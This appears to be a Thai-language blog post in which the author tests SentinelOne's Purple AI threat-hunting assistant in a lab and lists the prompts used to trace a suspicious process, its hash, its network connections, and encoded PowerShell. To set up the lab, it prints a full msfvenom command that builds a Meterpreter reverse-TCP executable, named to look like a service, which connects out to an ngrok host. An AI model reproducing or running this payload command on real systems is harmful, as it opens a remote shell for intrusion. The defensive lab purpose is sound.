AI — Threat Hunting by SentinelOne

AI — Threat Hunting by SentinelOne

Threat Hunting คือกระบวนการเชิงรุกในการค้นหาภัยคุกคามที่ซ่อนอยู่ภายในNetwork or Server ซึ่งอาจหลบซ่อนตัวอยู่โดยที่ระบบตรวจจับภัยคุกคามทั่วไปไม่สามารถตรวจพบได้ นักล่าภัยคุกคาม (Threat Hunters) จะใช้เทคนิคและเครื่องมือต่างๆ เพื่อค้นหาสิ่งที่ผิดปกติหรือบ่งชี้ถึงการมีภัยคุกคาม เช่น Investigate & Analysis Network , Investigate Behavior Suspicious and Investigate File or Software Suspicious เป็นต้น ครับ… ซึ่งหลักการของการทำ Threat Hunting มันก็มีเยอะ หลายรูปแบบ หลาย Framework นั้นเองครับ แต่ ส่วนตัวของผม ผมชอบใช้ หลักการ Threat Hunting Loop ถึงมันจะเก่าไป แล้วเข้าใจง่ายดีครับ

Threat Hunting Loop

Pyramid of Pain อันนี้ ผมก็จะเอา Model นี้ มาช่วยในการทำ Threat Hunting ด้วยครับ แบบว่า เป็นการวางแผนว่าสิ่งที่จะทำ หรือ สิ่งที่จะ Hun นั้น จะ Hun แบบไหน Hun ตามชั้น ของ Pyramid !!!! เป็นต้นครับ

Pyramid of Pain

สำหรับการทำ Threat Hunting ก็คร่าว ๆ แล้วแต่ว่าเราจะใช่รูปแบบไหนแล้วกันครับ แต่สำหรับวันนี้ คือ “AI Threat Hunting” ที่จะมาเขียนก็คือ ได้มีโอกาศใช่งาน และ ทดสอบ Product [EDR] SentinelOne — Feature “AI Threat Hunting” หรือ มันชื่อว่า Purple AI นั้นเอง ครับ คือ ทำได้ขนาดนี้เลย หรอ… ปกติ การทำ Threat Hunting จะต้องใช่หลักการอะไรเยอะแยะไปหมด ต้องตรวจสอบหา ข้อมูลเยอะมาก แต่ สำหรับ Purple AI นั้น แค่เราพิมพ์ ข้อความ Prompts ลงไป ก็เหมือน AI ทั่วไป พวก Chart GPT, Gemini นั้นแหละครับ คร่าว ๆ ประมาณนี้ครับ เดียวไปดู ความสามารถ ของเจ้า Purple AI กันเลยฮะ!!!

เมื่ออยากรู้ก็ต้องลอง.!!! ก็ต้องตั้ง LAB เพื่อทดสอบดิครับ… คือ ฟังคนอื่นเล่า มา ยังไงก็ไม่เห็นภาพ…ต้องเห็นภาพด้วยตัวเอง ฮะ โดยตั้ง LAB ในครั้งนี้คือ ใช่ Proxy: ngrok and Generate File “msfvenom -p windows/meterpreter/reverse_tcp” ส้าง File ชื่อ “servicees.exe”

msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ap.ngrok.io LPORT=16898 -f exe -o servicees.exe

Proxy-Ngrok

จาก LAB ที่ตั้งมานั้น ถ้า LAB ประมาณ นี้ มันคือ reverse tcp / reverse shell ถ้าเป็นผม ที่จะทำการ Hunting ผมจะ ใช่ประมาณนี้ ถูกผิด น้อย มาก มันขึ้นอยู่กับคน คิด ที่ทำ ตั้ง หรือการ Hypothesis นั้นก็หมายความว่า 10 คน ที่ทำ Threat Hunting มันก็ ไม่ตรงกัน ฮะ 555!!!

Question 1: Hello, you are cybersecurity Expert, I want to Threat hunting Process Suspicious The Process is Name “servicees.exe” Running Site “Test” Could you please provide information with me. — คือเราก็ต้อง Check ใช่หรือไม่ครับ ว่า Process นั้น ผิดปกติหรือไม่ และ Process นั้น ๆ มันอยู่ที่ไหน และใช่ Command-line อะไร บรา ๆ ๆ เพื่อตรวสอบความถูกต้องหรือความหน้าจะเป็น ครับ

Question1: Check Process [1]

Question1: Check Process [2]

Question2: Can you provide details hash of process ‘servicees.exe’ on the “Site: Test” ลองดู ดิว่ามันจะ แสดงค่า Hash ให้เราได้หรือไม่

Question2: Check Hash of Process File Servicees.exe

Website มหาชนในการ Check Hash = Virustotal 555

Question3: Check Network Connection

Question3: Check Network Connection

Question4: Check source IP initiating connections to the destination IP address 18.141.129.246 — — เมื่อเรา รู้ IP C2 แล้ว หรือ IP Reverse TCP/Reverse Shell เรา >> Step ต่อไป ก็คือ เราก็อยากรู้ใช่หรือไม่ครับ ว่า เครื่อง Client/Server ที่อยู่ในองกรณ์ของเรานั้น มี ติดต่อกับ C2 เครื่องไหนมั่ง และพอเราเจอเครื่องที่มีการติดต่อไปยัง C2 นั้น แล้ว…แสดงว่า มันโดนแว้ววว อิอิอิ

Question5: Can you provide details who used powershell.exe -enc — — ลอง Check สิว่า ภายในองกรณ์ของเรา มี เครื่องไหนใช่ PowerShell Encode มั่ง — — ขอแค่ถามไป AI ก็จะตอบมาแว้ว 555

Question5: Check PowerShell Encode

Conclusion:

เป็นไงมั่งครับจากตัวอย่าง LAB ที่แสดงให้ดูว่า จริง ๆ แล้วนั้นการทำ Threat Hunting มันง่ายขึ้นมาเลยนะครับ โดยปกติแล้ว เราจะต้องไปนั่ง ๆ ไล่หา หรือ ไล่ Query ตรวจสอบที่มันผิดปกติ บรา ๆ ๆ เยอะแยะไปหมด… แต่สำหรับ Purple AI นั้น เราแค่พิมพ์ถาม ไปแล้ว AI มันก็จะตอบเรามาเองแหละครับ 555 มันเลยทำให้ เราสามารถทำ Threat Hun ได้ง่าย ขึ้น โดยเพียงแค่พิมพ์ ถาม AI ….เป็นไงมั่งครับ ง่ายไหมครับ…ง่ายสิครับ แบบว่าไม่ต้องมี Knowledge or Skill ของ Product เลย และไม่ต้องรู้ว่า Menu มันอยู่ตรงไหน ขอให้รู้แค่ว่า เราจะ ถามอะไรไป เพียงเท่านี้ครับ เราก็จะได้ข้อมูล ที่ ครบถ้วน เลยฮะ!!!! — — อันนี้เป็นเพียงตัวอย่าง ที่ ได้ทดสอบนะครับ แต่จริง ๆแล้ว คิดว่า มันสามารถ มาช่วยงาน หรือลดงาน ทีมงาน Threat Hunting ได้เลยนะครับ สำหรับ Feature: Purple AI — Product SentinelOne

Ref: https://www.sentinelone.com/platform/purple/

Ref: https://www.threathunting.net/files/framework-for-threat-hunting-whitepaper.pdf

#แบ่งปัน
#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับ
#การเรียนรู้ไม่มีที่สิ้นสุด_เล่นไปเรื่อยๆ_ยิ่งเล่นยิ่งสนุก
#ผู้เขียนจัดทำเพื่อแชร์ความรู้และประสบการณ์นะครับผิดพลาดประการใดต้องขออภัยด้วยครับ
#มือใหม่กำลังหัดเขียนมีอะไรแนะนำได้เลยนะครับ
#Shareknowledgeandexperience